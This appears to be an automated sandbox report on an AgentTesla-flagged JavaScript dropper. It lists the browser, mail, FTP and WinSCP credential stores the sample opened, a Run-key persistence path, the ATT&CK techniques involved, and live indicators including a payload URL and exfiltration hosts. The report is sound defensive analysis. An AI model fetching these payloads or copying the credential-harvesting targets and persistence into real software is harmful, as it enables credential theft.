Source: Yara match	File source: 00000007.00000002.2699963900.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1545150331.000001A8E9449000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2697144825.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2699963900.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7944, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.powershell.exe.1a8e949b578.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.powershell.exe.1a8e949b578.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.1545150331.000001A8E9449000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2697144825.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2699963900.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7944, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.powershell.exe.1a8e949b578.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.powershell.exe.1a8e949b578.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2699963900.0000000002C4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2699963900.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1545150331.000001A8E9449000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2697144825.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2699963900.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7944, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	22 Scripting	Valid Accounts	231 Windows Management Instrumentation	22 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	211 Process Injection	1 Deobfuscate/Decode Files or Information	1 Input Capture	34 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	11 Command and Scripting Interpreter	11 Registry Run Keys / Startup Folder	11 Registry Run Keys / Startup Folder	2 Obfuscated Files or Information	1 Credentials in Registry	531 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 PowerShell	Login Hook	Login Hook	1 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	1 Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	261 Virtualization/Sandbox Evasion	SSH	Keylogging	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	261 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	211 Process Injection	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
INQUIRY#46789_MAT24_NEW_PROJECT_SAMPLE.js	8%	ReversingLabs

Source	Detection	Scanner	Link
smtp.zoho.eu	0%	Virustotal	Browse
ia601606.us.archive.org	0%	Virustotal	Browse
ip-api.com	0%	Virustotal	Browse
epanpano.com	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
https://account.dyn.com/	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://crl.microsoft	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
http://ip-api.com	0%	URL Reputation	safe
https://oneget.orgX	0%	URL Reputation	safe
https://aka.ms/pscore68	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://oneget.org	0%	URL Reputation	safe
http://ip-api.com/line/?fields=hosting	0%	URL Reputation	safe
https://epanpano.com	0%	Avira URL Cloud	safe
http://www.apache.org/licenses/LICENSE-2.0	0%	Avira URL Cloud	safe
http://cdp.thawte.com/ThawteTLSRSACAG1.crl0p	0%	Avira URL Cloud	safe
http://www.apache.org/licenses/LICENSE-2.0.html	0%	Avira URL Cloud	safe
http://www.microsoft.co	0%	Avira URL Cloud	safe
https://ia601606.us.archive.org/10/items/deathnote	0%	Avira URL Cloud	safe
https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg	100%	Avira URL Cloud	malware
http://cacerts.thawte.com/ThawteTLSRSACAG1.crt0	0%	Avira URL Cloud	safe
http://www.apache.org/licenses/LICENSE-2.0.html	0%	Virustotal		Browse
http://www.microsoft.co	1%	Virustotal		Browse
http://www.apache.org/licenses/LICENSE-2.0	0%	Virustotal		Browse
https://github.com/Pester/Pester	0%	Avira URL Cloud	safe
http://smtp.zoho.eu	0%	Avira URL Cloud	safe
https://ia601606.us.archive.org/10/items/deathnote	0%	Virustotal		Browse
http://status.thawte.com0:	0%	Avira URL Cloud	safe
http://epanpano.com	0%	Avira URL Cloud	safe
http://smtp.zoho.eu	0%	Virustotal		Browse
https://epanpano.com/log/ORGN.txt	0%	Avira URL Cloud	safe
http://cdp.thawte.com/ThawteTLSRSACAG1.crl0p	0%	Virustotal		Browse
https://ia601606.us.arX	0%	Avira URL Cloud	safe
https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg	4%	Virustotal		Browse
http://ia601606.us.archive.org	0%	Avira URL Cloud	safe
https://ia601606.us.archive.org	0%	Avira URL Cloud	safe
https://github.com/Pester/Pester	1%	Virustotal		Browse
http://epanpano.com	0%	Virustotal		Browse
http://cacerts.thawte.com/ThawteTLSRSACAG1.crt0	0%	Virustotal		Browse
http://ia601606.us.archive.org	0%	Virustotal		Browse
https://ia601606.us.archive.org	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
smtp.zoho.eu	185.230.212.164	true	true	0%, Virustotal, Browse	unknown
ia601606.us.archive.org	207.241.227.86	true	true	0%, Virustotal, Browse	unknown
ip-api.com	208.95.112.1	true	true	0%, Virustotal, Browse	unknown
epanpano.com	78.142.208.13	true	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg	true	4%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://epanpano.com/log/ORGN.txt	true	Avira URL Cloud: safe	unknown
http://ip-api.com/line/?fields=hosting	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000004.00000002.1529607955.000001A8DAA19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	powershell.exe, 00000004.00000002.1529607955.000001A8DA78F000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://epanpano.com	powershell.exe, 00000004.00000002.1529607955.000001A8D94E0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://account.dyn.com/	powershell.exe, 00000004.00000002.1545150331.000001A8E9449000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2697144825.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000004.00000002.1529607955.000001A8DA992000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1529607955.000001A8DA78F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.microsoft	powershell.exe, 00000004.00000002.1568396921.000001A8F14C9000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000004.00000002.1529607955.000001A8DA992000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1529607955.000001A8DA78F000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://go.micro	powershell.exe, 00000004.00000002.1529607955.000001A8DA0A1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://cdp.thawte.com/ThawteTLSRSACAG1.crl0p	RegAsm.exe, 00000007.00000002.2713398889.00000000060B2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2697982737.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2698787111.000000000106A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2698971154.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2699963900.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2699963900.0000000002DFB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2713398889.0000000006096000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.microsoft.co	powershell.exe, 00000004.00000002.1566950890.000001A8F12C9000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ia601606.us.archive.org/10/items/deathnote	powershell.exe, 00000002.00000002.1590939976.0000020212486000.00000004.00000800.00020000.00000000.sdmp	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://cacerts.thawte.com/ThawteTLSRSACAG1.crt0	RegAsm.exe, 00000007.00000002.2713398889.00000000060B2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2697982737.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2698787111.000000000106A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2698971154.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2699963900.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2699963900.0000000002DFB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2713398889.0000000006096000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000004.00000002.1529607955.000001A8DA992000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1529607955.000001A8DA78F000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://smtp.zoho.eu	RegAsm.exe, 00000007.00000002.2699963900.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2699963900.0000000002DFB000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://status.thawte.com0:	RegAsm.exe, 00000007.00000002.2713398889.00000000060B2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2697982737.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2698787111.000000000106A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2698971154.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2699963900.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2699963900.0000000002DFB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2713398889.0000000006096000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000004.00000002.1529607955.000001A8DAA19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ip-api.com	RegAsm.exe, 00000007.00000002.2699963900.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://oneget.orgX	powershell.exe, 00000004.00000002.1529607955.000001A8DA78F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://epanpano.com	powershell.exe, 00000004.00000002.1529607955.000001A8D9663000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ia601606.us.arX	powershell.exe, 00000004.00000002.1529607955.000001A8DA741000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000002.00000002.1590939976.0000020211D1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1590939976.0000020211D33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1529607955.000001A8D9111000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.1590939976.0000020211D60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1529607955.000001A8D9111000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2699963900.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ia601606.us.archive.org	powershell.exe, 00000004.00000002.1529607955.000001A8DA747000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://oneget.org	powershell.exe, 00000004.00000002.1529607955.000001A8DA78F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ia601606.us.archive.org	powershell.exe, 00000004.00000002.1529607955.000001A8DA479000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1529607955.000001A8D9333000.00000004.00000800.00020000.00000000.sdmp	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
207.241.227.86	ia601606.us.archive.org	United States	7941	INTERNET-ARCHIVEUS	true
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	true
185.230.212.164	smtp.zoho.eu	Netherlands	41913	COMPUTERLINEComputerlineSchlierbachSwitzerlandCH	true
78.142.208.13	epanpano.com	Turkey	209853	VERIDYENVeridyenBilisimTeknolojileriSanayiveTicaretLi	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1501719
Start date and time:	2024-08-30 10:37:55 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 15s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	INQUIRY#46789_MAT24_NEW_PROJECT_SAMPLE.js
Detection:	MAL
Classification:	mal100.spre.troj.spyw.expl.evad.winJS@11/5@4/4
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 100% Number of executed functions: 74 Number of non-executed functions: 1
Cookbook Comments:	Found application associated with file extension: .js

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 7564 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
04:38:53	API Interceptor	44x Sleep call for process: powershell.exe modified
04:39:01	API Interceptor	56x Sleep call for process: RegAsm.exe modified
10:39:00	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\atrophiante.js
10:39:08	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\atrophiante.js

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
207.241.227.86	Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.js	Get hash	malicious	AgentTesla	Browse
	payment PAGO 2974749647839452.js	Get hash	malicious	Unknown	Browse
	payment PAGO 2974749647839452.js	Get hash	malicious	FormBook	Browse
	RFQ-MR-24-09101 SPS.js	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	INQUIRY#46789-AUG24.js	Get hash	malicious	AgentTesla	Browse
	RFQ448903423_MAT_HASUE_de_Mexico.js	Get hash	malicious	AgentTesla	Browse
	INQUIRY#46789-AUG24.js	Get hash	malicious	Remcos	Browse
	Comprovante_Swift.xlam.xlsx	Get hash	malicious	AgentTesla	Browse
	Shipping Documents.js	Get hash	malicious	Remcos	Browse
	shipping documents.js	Get hash	malicious	Unknown	Browse
208.95.112.1	inv-lista de embalaje de env#U00edo 08-29.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.js	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	OFFER-INQUIRY.jar	Get hash	malicious	STRRAT	Browse	ip-api.com/json/
	adbce.exe	Get hash	malicious	AZORult, Quasar, Ramnit	Browse	ip-api.com/json/
	dlmgr.exe	Get hash	malicious	AZORult, Quasar, Ramnit	Browse	ip-api.com/json/
	REVISED PI.PDF.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	NEW ORDER.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	Orden de compra.000854657689654253545676785436.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	00_datos de la transacci#U00f3n rechazada y n#U00famero de cuenta incorrecto.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	1.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	ip-api.com/line/?fields=hosting
185.230.212.164	Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.js	Get hash	malicious	AgentTesla	Browse
	172473834493f9dd4c11e505629bd9b8efb5932f698a99acd495429ea8dcfe99effc6f3741352.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse
	RFQ448903423_MAT_HASUE_de_Mexico.js	Get hash	malicious	AgentTesla	Browse
	File.com.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse
	Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse
	1qwF1J2Njh.exe	Get hash	malicious	AgentTesla	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
epanpano.com	Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.js	Get hash	malicious	AgentTesla	Browse	78.142.208.13
ip-api.com	inv-lista de embalaje de env#U00edo 08-29.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.js	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	OFFER-INQUIRY.jar	Get hash	malicious	STRRAT	Browse	208.95.112.1
	adbce.exe	Get hash	malicious	AZORult, Quasar, Ramnit	Browse	208.95.112.1
	dlmgr.exe	Get hash	malicious	AZORult, Quasar, Ramnit	Browse	208.95.112.1
	REVISED PI.PDF.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	NEW ORDER.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Orden de compra.000854657689654253545676785436.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	00_datos de la transacci#U00f3n rechazada y n#U00famero de cuenta incorrecto.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	1.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	208.95.112.1
smtp.zoho.eu	Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.js	Get hash	malicious	AgentTesla	Browse	185.230.212.164
	172473834493f9dd4c11e505629bd9b8efb5932f698a99acd495429ea8dcfe99effc6f3741352.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse	185.230.212.164
	RFQ448903423_MAT_HASUE_de_Mexico.js	Get hash	malicious	AgentTesla	Browse	185.230.212.164
	File.com.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	185.230.212.164
	Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	185.230.212.164
	Orden#46789_2024_Optoflux_mexico_sderlss.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	185.230.214.164
	Orden#46789_2024_Optoflux_mexico_sderlsTY.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	185.230.214.164
	Orden#46789_2024_Optoflux_mexico_sderlsTYP.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	185.230.214.164
	okPY77wv6E.exe	Get hash	malicious	AgentTesla	Browse	185.230.214.164
	RFQ678903423_PROD_HASUE_de_Mexicso_MAT_MEX.exe	Get hash	malicious	AgentTesla	Browse	185.230.214.164
ia601606.us.archive.org	Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.js	Get hash	malicious	AgentTesla	Browse	207.241.227.86
	payment PAGO 2974749647839452.js	Get hash	malicious	Unknown	Browse	207.241.227.86
	payment PAGO 2974749647839452.js	Get hash	malicious	FormBook	Browse	207.241.227.86
	RFQ-MR-24-09101 SPS.js	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	207.241.227.86
	INQUIRY#46789-AUG24.js	Get hash	malicious	AgentTesla	Browse	207.241.227.86
	RFQ448903423_MAT_HASUE_de_Mexico.js	Get hash	malicious	AgentTesla	Browse	207.241.227.86
	INQUIRY#46789-AUG24.js	Get hash	malicious	Remcos	Browse	207.241.227.86
	Comprovante_Swift.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	207.241.227.86
	Shipping Documents.js	Get hash	malicious	Remcos	Browse	207.241.227.86
	shipping documents.js	Get hash	malicious	Unknown	Browse	207.241.227.86

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
INTERNET-ARCHIVEUS	inv-lista de embalaje de env#U00edo 08-29.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	207.241.232.154
	Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.js	Get hash	malicious	AgentTesla	Browse	207.241.227.86
	RFQ_0030829024SEPT.xla.xlsx	Get hash	malicious	Remcos	Browse	207.241.232.154
	RFQ -PO-SMT290824.xls	Get hash	malicious	Remcos	Browse	207.241.232.154
	SI_56127.vbs	Get hash	malicious	Remcos	Browse	207.241.232.154
	CAN_POST2617276.vbs	Get hash	malicious	Remcos	Browse	207.241.232.154
	CAN_POST7865678.vbs	Get hash	malicious	AsyncRAT	Browse	207.241.232.154
	Sepco RFQ.xls	Get hash	malicious	Remcos	Browse	207.241.232.154
	SecuriteInfo.com.Exploit.CVE-2017-11882.123.9070.28632.rtf	Get hash	malicious	Remcos	Browse	207.241.232.154
	payment PAGO 2974749647839452.js	Get hash	malicious	Unknown	Browse	207.241.227.86
COMPUTERLINEComputerlineSchlierbachSwitzerlandCH	Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.js	Get hash	malicious	AgentTesla	Browse	185.230.212.164
